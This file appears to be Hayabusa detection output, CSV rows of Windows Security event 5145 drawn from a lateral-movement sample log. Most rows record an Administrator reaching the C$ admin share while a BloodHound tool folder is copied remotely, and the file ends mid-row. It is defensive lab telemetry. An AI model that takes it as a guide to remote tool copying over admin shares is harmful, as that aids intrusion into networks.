2019-03-18 23:23:24.087 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@fortawesome\fontawesome-free | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.087 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@fortawesome\fontawesome-free\css | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.087 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@fortawesome\fontawesome-free\js | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.097 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@fortawesome\fontawesome-free\less | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.097 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@fortawesome\fontawesome-free\scss | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.107 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@fortawesome\fontawesome-free\sprites | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.107 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@fortawesome\fontawesome-free\svgs | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.107 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@fortawesome\fontawesome-free\webfonts | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.117 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@types | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.117 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\adler-32 | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.117 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\adler-32\bin | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.127 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\adler-32\types | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.127 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\aphrodite | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.137 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\aphrodite\.nyc_output | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.137 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\aphrodite\dist | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.137 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\aphrodite\examples | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.147 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\aphrodite\examples\src | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.147 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\aphrodite\lib | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.147 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\aphrodite\src | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.147 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\aphrodite\tests | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.157 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\asap | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.157 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\async | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.167 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\async\dist | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.167 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\async\internal | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.177 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.177 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.177 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\array | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.187 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\error | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.187 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\json | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.197 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\math | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.197 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\number | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.197 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\object | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.197 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\reflect | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.207 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\regexp | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.207 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\string | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.207 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\symbol | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.217 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\system | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.217 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\helpers | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.227 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\regenerator | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.227 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\balanced-match | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.227 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\big-integer | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.237 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\binary | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.237 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\binary\example | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.237 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\binary\lib | IP Addr: 10.0.2.15 | LID: 
0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.237 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\binary\perf | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.247 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\binary\test | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.247 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bluebird | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.247 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bluebird\js | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.257 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bluebird\js\browser | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.257 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bluebird\js\release | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.257 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.267 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap\dist | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.267 +09:00,PC01.example.corp,5145,info,Collect,Network 
Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap\dist\css | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.267 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap\dist\fonts | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.277 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap\dist\js | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.277 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap\fonts | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.277 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
